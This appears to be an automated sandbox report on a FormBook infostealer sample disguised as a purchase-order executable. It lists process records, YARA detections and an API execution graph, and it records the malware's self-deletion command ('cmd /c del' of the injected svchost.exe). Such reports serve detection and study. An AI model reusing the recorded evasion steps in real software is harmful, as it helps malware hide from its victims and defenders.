                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:09:27:57
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
                                                          Imagebase:0x320000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:09:27:58
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff674740000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:09:28:06
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\SysWOW64\autochk.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\SysWOW64\autochk.exe"
                                                          Imagebase:0x2d0000
                                                          File size:863'232 bytes
                                                          MD5 hash:FC398299F54290D5F35C69E865FD7CC2
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:09:28:12
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                          Imagebase:0xcb0000
                                                          File size:29'184 bytes
                                                          MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:6
                                                          Start time:09:28:12
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:09:28:12
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.4%
                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                            Signature Coverage:8.8%
                                                            Total number of Nodes:1998
                                                            Total number of Limit Nodes:35
                                                            execution_graph 86075 4010e0 86078 401100 86075->86078 86077 4010f8 86079 401113 86078->86079 86080 401184 86079->86080 86081 40114c 86079->86081 86083 401120 86079->86083 86110 401182 86079->86110 86116 401250 61 API calls __call_reportfault 86080->86116 86084 401151 86081->86084 86085 40119d 86081->86085 86082 40112c DefWindowProcW 86082->86077 86083->86082 86123 401000 Shell_NotifyIconW __call_reportfault 86083->86123 86087 401219 86084->86087 86088 40115d 86084->86088 86090 4011a3 86085->86090 86091 42afb4 86085->86091 86087->86083 86094 401225 86087->86094 86092 401163 86088->86092 86093 42b01d 86088->86093 86089 401193 86089->86077 86090->86083 86100 4011b6 KillTimer 86090->86100 86101 4011db SetTimer RegisterWindowMessageW 86090->86101 86118 40f190 10 API calls 86091->86118 86097 42afe9 86092->86097 86098 40116c 86092->86098 86093->86082 86122 4370f4 52 API calls 86093->86122 86134 468b0e 74 API calls __call_reportfault 86094->86134 86120 40f190 10 API calls 86097->86120 86098->86083 86104 401174 86098->86104 86099 42b04f 86124 40e0c0 86099->86124 86117 401000 Shell_NotifyIconW __call_reportfault 86100->86117 86101->86089 86102 401204 CreatePopupMenu 86101->86102 86102->86077 86119 45fd57 65 API calls __call_reportfault 86104->86119 86109 4011c9 PostQuitMessage 86109->86077 86110->86082 86111 42afe4 86111->86089 86112 42b00e 86121 401a50 331 API calls 86112->86121 86115 42afdc 86115->86082 86115->86111 86116->86089 86117->86109 86118->86089 86119->86115 86120->86112 86121->86110 86122->86110 86123->86099 86126 40e0e7 __call_reportfault 86124->86126 86125 40e142 86129 40e184 86125->86129 86157 4341e6 63 API calls __wcsicoll 86125->86157 86126->86125 86127 42729f DestroyIcon 86126->86127 86127->86125 86130 40e1a0 Shell_NotifyIconW 86129->86130 86131 4272db Shell_NotifyIconW 86129->86131 86135 401b80 86130->86135 86133 40e1ba 86133->86110 86134->86111 86136 401b9c 86135->86136 86156 401c7e 86135->86156 86158 4013c0 86136->86158 86139 42722b LoadStringW 86142 427246 86139->86142 86140 401bb9 86163 402160 86140->86163 86177 40e0a0 86142->86177 86143 401bcd 86145 427258 86143->86145 86146 401bda 86143->86146 86181 40d200 52 API calls 2 library calls 86145->86181 86146->86142 86148 401be4 86146->86148 86176 40d200 52 API calls 2 library calls 86148->86176 86150 427267 86151 42727b 86150->86151 86153 401bf3 _wcscpy __call_reportfault _wcsncpy 86150->86153 86182 40d200 52 API calls 2 library calls 86151->86182 86155 401c62 Shell_NotifyIconW 86153->86155 86154 427289 86155->86156 86156->86133 86157->86129 86183 4115d7 86158->86183 86164 426daa 86163->86164 86165 40216b _wcslen 86163->86165 86221 40c600 86164->86221 86168 402180 86165->86168 86169 40219e 86165->86169 86167 426db5 86167->86143 86220 403bd0 52 API calls moneypunct 86168->86220 86171 4013a0 52 API calls 86169->86171 86173 4021a5 86171->86173 86172 426db7 86173->86172 86174 4115d7 52 API calls 86173->86174 86175 402187 _memmove 86174->86175 86175->86143 86176->86153 86178 40e0b2 86177->86178 86179 40e0a8 86177->86179 86178->86153 86233 403c30 52 API calls _memmove 86179->86233 86181->86150 86182->86154 86186 4115e1 _malloc 86183->86186 86185 4013e4 86194 4013a0 86185->86194 86186->86185 86189 4115fd std::exception::exception 86186->86189 86197 4135bb 86186->86197 86187 41163b 86212 4180af 46 API calls std::exception::operator= 86187->86212 86189->86187 86211 41130a 51 API calls __cinit 86189->86211 86190 411645 86213 418105 RaiseException 86190->86213 86193 411656 86195 4115d7 52 API calls 86194->86195 86196 4013a7 86195->86196 86196->86139 86196->86140 86198 413638 _malloc 86197->86198 86209 4135c9 _malloc 86197->86209 86219 417f77 46 API calls __getptd_noexit 86198->86219 86199 4135d4 86199->86209 86214 418901 46 API calls __NMSG_WRITE 86199->86214 86215 418752 46 API calls 6 library calls 86199->86215 86216 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86199->86216 86202 4135f7 RtlAllocateHeap 86204 413630 86202->86204 86202->86209 86204->86186 86205 413624 86217 417f77 46 API calls __getptd_noexit 86205->86217 86208 413622 86218 417f77 46 API calls __getptd_noexit 86208->86218 86209->86199 86209->86202 86209->86205 86209->86208 86211->86187 86212->86190 86213->86193 86214->86199 86215->86199 86217->86208 86218->86204 86219->86204 86220->86175 86222 40c619 86221->86222 86223 40c60a 86221->86223 86222->86167 86223->86222 86226 4026f0 86223->86226 86225 426d7a _memmove 86225->86167 86227 426873 86226->86227 86228 4026ff 86226->86228 86229 4013a0 52 API calls 86227->86229 86228->86225 86230 42687b 86229->86230 86231 4115d7 52 API calls 86230->86231 86232 42689e _memmove 86231->86232 86232->86225 86233->86178 86234 40bd20 86235 428194 86234->86235 86242 40bd2d 86234->86242 86236 40bd43 86235->86236 86238 4281bc 86235->86238 86240 4281b2 86235->86240 86256 45e987 86 API calls moneypunct 86238->86256 86255 40b510 VariantClear 86240->86255 86243 40bd37 86242->86243 86257 4531b1 85 API calls 5 library calls 86242->86257 86246 40bd50 86243->86246 86245 4281ba 86247 426cf1 86246->86247 86248 40bd63 86246->86248 86267 44cde9 52 API calls _memmove 86247->86267 86258 40bd80 86248->86258 86251 40bd73 86251->86236 86252 426cfc 86253 40e0a0 52 API calls 86252->86253 86254 426d02 86253->86254 86255->86245 86256->86242 86257->86243 86259 40bd8e 86258->86259 86263 40bdb7 _memmove 86258->86263 86260 40bded 86259->86260 86261 40bdad 86259->86261 86259->86263 86264 4115d7 52 API calls 86260->86264 86268 402f00 86261->86268 86263->86251 86265 40bdf6 86264->86265 86265->86263 86266 4115d7 52 API calls 86265->86266 86266->86263 86267->86252 86269 402f10 86268->86269 86270 402f0c 86268->86270 86271 4268c3 86269->86271 86272 4115d7 52 API calls 86269->86272 86270->86263 86273 402f51 moneypunct _memmove 86272->86273 86273->86263 86274 425ba2 86279 40e360 86274->86279 86276 425bb4 86295 41130a 51 API calls __cinit 86276->86295 86278 425bbe 86280 4115d7 52 API calls 86279->86280 86281 40e3ec GetModuleFileNameW 86280->86281 86296 413a0e 86281->86296 86283 40e421 _wcsncat 86299 413a9e 86283->86299 86286 4115d7 52 API calls 86287 40e45e _wcscpy 86286->86287 86302 40bc70 86287->86302 86291 40e4a9 86291->86276 86292 40e4a1 _wcscat _wcslen _wcsncpy 86292->86291 86293 4115d7 52 API calls 86292->86293 86294 401c90 52 API calls 86292->86294 86293->86292 86294->86292 86295->86278 86321 413801 86296->86321 86351 419efd 86299->86351 86303 4115d7 52 API calls 86302->86303 86304 40bc98 86303->86304 86305 4115d7 52 API calls 86304->86305 86306 40bca6 86305->86306 86307 40e4c0 86306->86307 86363 403350 86307->86363 86309 40e4cb RegOpenKeyExW 86310 427190 RegQueryValueExW 86309->86310 86311 40e4eb 86309->86311 86312 4271b0 86310->86312 86313 42721a RegCloseKey 86310->86313 86311->86292 86314 4115d7 52 API calls 86312->86314 86313->86292 86315 4271cb 86314->86315 86370 43652f 52 API calls 86315->86370 86317 4271d8 RegQueryValueExW 86318 42720e 86317->86318 86319 4271f7 86317->86319 86318->86313 86320 402160 52 API calls 86319->86320 86320->86318 86322 41389e 86321->86322 86329 41381a 86321->86329 86323 4139e8 86322->86323 86325 413a00 86322->86325 86348 417f77 46 API calls __getptd_noexit 86323->86348 86350 417f77 46 API calls __getptd_noexit 86325->86350 86326 4139ed 86349 417f25 10 API calls __fclose_nolock 86326->86349 86329->86322 86334 41388a 86329->86334 86343 419e30 46 API calls __fclose_nolock 86329->86343 86331 41396c 86331->86322 86332 413967 86331->86332 86335 41397a 86331->86335 86332->86283 86333 413929 86333->86322 86336 413945 86333->86336 86345 419e30 46 API calls __fclose_nolock 86333->86345 86334->86322 86342 413909 86334->86342 86344 419e30 46 API calls __fclose_nolock 86334->86344 86347 419e30 46 API calls __fclose_nolock 86335->86347 86336->86322 86336->86332 86339 41395b 86336->86339 86346 419e30 46 API calls __fclose_nolock 86339->86346 86342->86331 86342->86333 86343->86334 86344->86342 86345->86336 86346->86332 86347->86332 86348->86326 86349->86332 86350->86332 86352 419f13 86351->86352 86353 419f0e 86351->86353 86360 417f77 46 API calls __getptd_noexit 86352->86360 86353->86352 86354 419f2b 86353->86354 86358 40e454 86354->86358 86362 417f77 46 API calls __getptd_noexit 86354->86362 86358->86286 86359 419f18 86361 417f25 10 API calls __fclose_nolock 86359->86361 86360->86359 86361->86358 86362->86359 86364 403367 86363->86364 86365 403358 86363->86365 86366 4115d7 52 API calls 86364->86366 86365->86309 86367 403370 86366->86367 86368 4115d7 52 API calls 86367->86368 86369 40339e 86368->86369 86369->86309 86370->86317 86371 3fa23f8 86385 3fa0048 86371->86385 86373 3fa24d2 86388 3fa22e8 86373->86388 86391 3fa34f8 GetPEB 86385->86391 86387 3fa06d3 86387->86373 86389 3fa22f1 Sleep 86388->86389 86390 3fa22ff 86389->86390 86392 3fa3522 86391->86392 86392->86387 86393 416454 86430 416c70 86393->86430 86395 416460 GetStartupInfoW 86396 416474 86395->86396 86431 419d5a HeapCreate 86396->86431 86398 4164cd 86399 4164d8 86398->86399 86515 41642b 46 API calls 3 library calls 86398->86515 86432 417c20 GetModuleHandleW 86399->86432 86402 4164de 86403 4164e9 __RTC_Initialize 86402->86403 86516 41642b 46 API calls 3 library calls 86402->86516 86451 41aaa1 GetStartupInfoW 86403->86451 86407 416503 GetCommandLineW 86464 41f584 GetEnvironmentStringsW 86407->86464 86411 416513 86470 41f4d6 GetModuleFileNameW 86411->86470 86413 41651d 86414 416528 86413->86414 86518 411924 46 API calls 3 library calls 86413->86518 86474 41f2a4 86414->86474 86417 41652e 86418 416539 86417->86418 86519 411924 46 API calls 3 library calls 86417->86519 86488 411703 86418->86488 86421 416541 86423 41654c __wwincmdln 86421->86423 86520 411924 46 API calls 3 library calls 86421->86520 86492 40d6b0 86423->86492 86426 41657c 86522 411906 46 API calls _doexit 86426->86522 86429 416581 _fseek 86430->86395 86431->86398 86433 417c34 86432->86433 86434 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86432->86434 86523 4178ff 49 API calls _free 86433->86523 86435 417c87 TlsAlloc 86434->86435 86439 417cd5 TlsSetValue 86435->86439 86440 417d96 86435->86440 86437 417c39 86437->86402 86439->86440 86441 417ce6 __init_pointers 86439->86441 86440->86402 86524 418151 InitializeCriticalSectionAndSpinCount 86441->86524 86443 417d91 86532 4178ff 49 API calls _free 86443->86532 86445 417d2a 86445->86443 86525 416b49 86445->86525 86448 417d76 86531 41793c 46 API calls 4 library calls 86448->86531 86450 417d7e GetCurrentThreadId 86450->86440 86452 416b49 __calloc_crt 46 API calls 86451->86452 86453 41aabf 86452->86453 86454 41ac34 86453->86454 86456 416b49 __calloc_crt 46 API calls 86453->86456 86458 4164f7 86453->86458 86460 41abb4 86453->86460 86455 41ac6a GetStdHandle 86454->86455 86457 41acce SetHandleCount 86454->86457 86459 41ac7c GetFileType 86454->86459 86463 41aca2 InitializeCriticalSectionAndSpinCount 86454->86463 86455->86454 86456->86453 86457->86458 86458->86407 86517 411924 46 API calls 3 library calls 86458->86517 86459->86454 86460->86454 86461 41abe0 GetFileType 86460->86461 86462 41abeb InitializeCriticalSectionAndSpinCount 86460->86462 86461->86460 86461->86462 86462->86458 86462->86460 86463->86454 86463->86458 86465 41f595 86464->86465 86466 41f599 86464->86466 86465->86411 86542 416b04 86466->86542 86468 41f5bb _memmove 86469 41f5c2 FreeEnvironmentStringsW 86468->86469 86469->86411 86471 41f50b _wparse_cmdline 86470->86471 86472 416b04 __malloc_crt 46 API calls 86471->86472 86473 41f54e _wparse_cmdline 86471->86473 86472->86473 86473->86413 86475 41f2bc _wcslen 86474->86475 86479 41f2b4 86474->86479 86476 416b49 __calloc_crt 46 API calls 86475->86476 86481 41f2e0 _wcslen 86476->86481 86477 41f336 86549 413748 86477->86549 86479->86417 86480 416b49 __calloc_crt 46 API calls 86480->86481 86481->86477 86481->86479 86481->86480 86482 41f35c 86481->86482 86485 41f373 86481->86485 86548 41ef12 46 API calls __fclose_nolock 86481->86548 86483 413748 _free 46 API calls 86482->86483 86483->86479 86555 417ed3 86485->86555 86487 41f37f 86487->86417 86489 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86488->86489 86491 411750 __IsNonwritableInCurrentImage 86489->86491 86574 41130a 51 API calls __cinit 86489->86574 86491->86421 86493 42e2f3 86492->86493 86494 40d6cc 86492->86494 86575 408f40 86494->86575 86496 40d707 86579 40ebb0 86496->86579 86501 40d737 86582 411951 86501->86582 86504 40d751 86594 40f4e0 SystemParametersInfoW SystemParametersInfoW 86504->86594 86506 40d75f 86595 40d590 GetCurrentDirectoryW 86506->86595 86508 40d767 SystemParametersInfoW 86509 40d794 86508->86509 86510 40d78d FreeLibrary 86508->86510 86511 408f40 VariantClear 86509->86511 86510->86509 86512 40d79d 86511->86512 86513 408f40 VariantClear 86512->86513 86514 40d7a6 86513->86514 86514->86426 86521 4118da 46 API calls _doexit 86514->86521 86515->86399 86516->86403 86521->86426 86522->86429 86523->86437 86524->86445 86527 416b52 86525->86527 86528 416b8f 86527->86528 86529 416b70 Sleep 86527->86529 86533 41f677 86527->86533 86528->86443 86528->86448 86530 416b85 86529->86530 86530->86527 86530->86528 86531->86450 86532->86440 86534 41f683 86533->86534 86538 41f69e _malloc 86533->86538 86535 41f68f 86534->86535 86534->86538 86541 417f77 46 API calls __getptd_noexit 86535->86541 86537 41f6b1 HeapAlloc 86537->86538 86540 41f6d8 86537->86540 86538->86537 86538->86540 86539 41f694 86539->86527 86540->86527 86541->86539 86545 416b0d 86542->86545 86543 4135bb _malloc 45 API calls 86543->86545 86544 416b43 86544->86468 86545->86543 86545->86544 86546 416b24 Sleep 86545->86546 86547 416b39 86546->86547 86547->86544 86547->86545 86548->86481 86550 41377c __dosmaperr 86549->86550 86551 413753 RtlFreeHeap 86549->86551 86550->86479 86551->86550 86552 413768 86551->86552 86558 417f77 46 API calls __getptd_noexit 86552->86558 86554 41376e GetLastError 86554->86550 86559 417daa 86555->86559 86558->86554 86560 417dc9 __call_reportfault 86559->86560 86561 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86560->86561 86563 417eb5 __call_reportfault 86561->86563 86565 41a208 86563->86565 86564 417ed1 GetCurrentProcess TerminateProcess 86564->86487 86566 41a210 86565->86566 86567 41a212 IsDebuggerPresent 86565->86567 86566->86564 86573 41fe19 86567->86573 86570 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86571 421ff0 __call_reportfault 86570->86571 86572 421ff8 GetCurrentProcess TerminateProcess 86570->86572 86571->86572 86572->86564 86573->86570 86574->86491 86577 408f48 moneypunct 86575->86577 86576 4265c7 VariantClear 86578 408f55 moneypunct 86576->86578 86577->86576 86577->86578 86578->86496 86635 40ebd0 86579->86635 86639 4182cb 86582->86639 86584 41195e 86646 4181f2 LeaveCriticalSection 86584->86646 86586 40d748 86587 4119b0 86586->86587 86588 4119d6 86587->86588 86589 4119bc 86587->86589 86588->86504 86589->86588 86681 417f77 46 API calls __getptd_noexit 86589->86681 86591 4119c6 86682 417f25 10 API calls __fclose_nolock 86591->86682 86593 4119d1 86593->86504 86594->86506 86683 401f20 86595->86683 86597 40d5b6 IsDebuggerPresent 86598 40d5c4 86597->86598 86599 42e1bb MessageBoxA 86597->86599 86600 42e1d4 86598->86600 86601 40d5e3 86598->86601 86599->86600 86855 403a50 52 API calls 3 library calls 86600->86855 86753 40f520 86601->86753 86605 40d5fd GetFullPathNameW 86765 401460 86605->86765 86607 40d63b 86608 40d643 86607->86608 86609 42e231 SetCurrentDirectoryW 86607->86609 86610 40d64c 86608->86610 86856 432fee 6 API calls 86608->86856 86609->86608 86780 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86610->86780 86614 42e252 86614->86610 86616 42e25a GetModuleFileNameW 86614->86616 86618 42e274 86616->86618 86619 42e2cb GetForegroundWindow ShellExecuteW 86616->86619 86617 40d656 86621 40d669 86617->86621 86624 40e0c0 74 API calls 86617->86624 86857 401b10 86618->86857 86622 40d688 86619->86622 86788 4091e0 86621->86788 86628 40d692 SetCurrentDirectoryW 86622->86628 86624->86621 86628->86508 86629 42e28d 86864 40d200 52 API calls 2 library calls 86629->86864 86632 42e299 GetForegroundWindow ShellExecuteW 86633 42e2c6 86632->86633 86633->86622 86634 40ec00 LoadLibraryA GetProcAddress 86634->86501 86636 40d72e 86635->86636 86637 40ebd6 LoadLibraryA 86635->86637 86636->86501 86636->86634 86637->86636 86638 40ebe7 GetProcAddress 86637->86638 86638->86636 86640 4182e0 86639->86640 86641 4182f3 EnterCriticalSection 86639->86641 86647 418209 86640->86647 86641->86584 86643 4182e6 86643->86641 86674 411924 46 API calls 3 library calls 86643->86674 86646->86586 86648 418215 _fseek 86647->86648 86649 418225 86648->86649 86650 41823d 86648->86650 86675 418901 46 API calls __NMSG_WRITE 86649->86675 86653 416b04 __malloc_crt 45 API calls 86650->86653 86659 41824b _fseek 86650->86659 86652 41822a 86676 418752 46 API calls 6 library calls 86652->86676 86655 418256 86653->86655 86657 41825d 86655->86657 86658 41826c 86655->86658 86656 418231 86677 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86656->86677 86678 417f77 46 API calls __getptd_noexit 86657->86678 86662 4182cb __lock 45 API calls 86658->86662 86659->86643 86664 418273 86662->86664 86665 4182a6 86664->86665 86666 41827b InitializeCriticalSectionAndSpinCount 86664->86666 86669 413748 _free 45 API calls 86665->86669 86667 418297 86666->86667 86668 41828b 86666->86668 86680 4182c2 LeaveCriticalSection _doexit 86667->86680 86670 413748 _free 45 API calls 86668->86670 86669->86667 86671 418291 86670->86671 86679 417f77 46 API calls __getptd_noexit 86671->86679 86675->86652 86676->86656 86678->86659 86679->86667 86680->86659 86681->86591 86682->86593 86865 40e6e0 86683->86865 86687 401f41 GetModuleFileNameW 86883 410100 86687->86883 86689 401f5c 86895 410960 86689->86895 86692 401b10 52 API calls 86693 401f81 86692->86693 86898 401980 86693->86898 86695 401f8e 86696 408f40 VariantClear 86695->86696 86697 401f9d 86696->86697 86698 401b10 52 API calls 86697->86698 86699 401fb4 86698->86699 86700 401980 53 API calls 86699->86700 86701 401fc3 86700->86701 86702 401b10 52 API calls 86701->86702 86703 401fd2 86702->86703 86906 40c2c0 86703->86906 86705 401fe1 86706 40bc70 52 API calls 86705->86706 86707 401ff3 86706->86707 86924 401a10 86707->86924 86709 401ffe 86931 4114ab 86709->86931 86712 428b05 86714 401a10 52 API calls 86712->86714 86713 402017 86715 4114ab __wcsicoll 58 API calls 86713->86715 86716 428b18 86714->86716 86717 402022 86715->86717 86719 401a10 52 API calls 86716->86719 86717->86716 86718 40202d 86717->86718 86720 4114ab __wcsicoll 58 API calls 86718->86720 86721 428b33 86719->86721 86722 402038 86720->86722 86724 428b3b GetModuleFileNameW 86721->86724 86723 402043 86722->86723 86722->86724 86725 4114ab __wcsicoll 58 API calls 86723->86725 86726 401a10 52 API calls 86724->86726 86727 40204e 86725->86727 86728 428b6c 86726->86728 86729 402092 86727->86729 86735 401a10 52 API calls 86727->86735 86738 428b90 _wcscpy 86727->86738 86730 40e0a0 52 API calls 86728->86730 86731 4020a3 86729->86731 86729->86738 86732 428b7a 86730->86732 86734 428bc6 86731->86734 86939 40e830 53 API calls 86731->86939 86733 401a10 52 API calls 86732->86733 86737 428b88 86733->86737 86736 402073 _wcscpy 86735->86736 86743 401a10 52 API calls 86736->86743 86737->86738 86740 401a10 52 API calls 86738->86740 86748 4020d0 86740->86748 86741 4020bb 86940 40cf00 53 API calls 86741->86940 86743->86729 86744 4020c6 86745 408f40 VariantClear 86744->86745 86745->86748 86747 402110 86750 408f40 VariantClear 86747->86750 86748->86747 86751 401a10 52 API calls 86748->86751 